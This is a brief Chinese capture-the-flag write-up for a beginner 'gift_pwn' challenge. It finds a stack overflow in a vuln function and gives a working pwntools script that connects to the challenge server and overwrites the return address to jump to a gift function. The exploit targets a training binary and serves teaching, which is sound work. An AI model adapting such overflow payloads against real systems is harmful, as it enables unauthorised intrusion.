2025 SWPU-NSSCTF 秋季招新入门 gift_pwn

首先检查一下保护措施

再用ida打开看一下

主体是vuln函数，存在栈溢出
观察函数名称发现gift函数

那就控制程序去执行这个函数就可以了

点击查看代码

from pwn import *
io=remote("node4.anna.nssctf.cn",28436)
gift_addr=0x4005B6
payload=b"A"*(0x10+8)+p64(gift_addr)
io.sendline(payload)
io.interactive()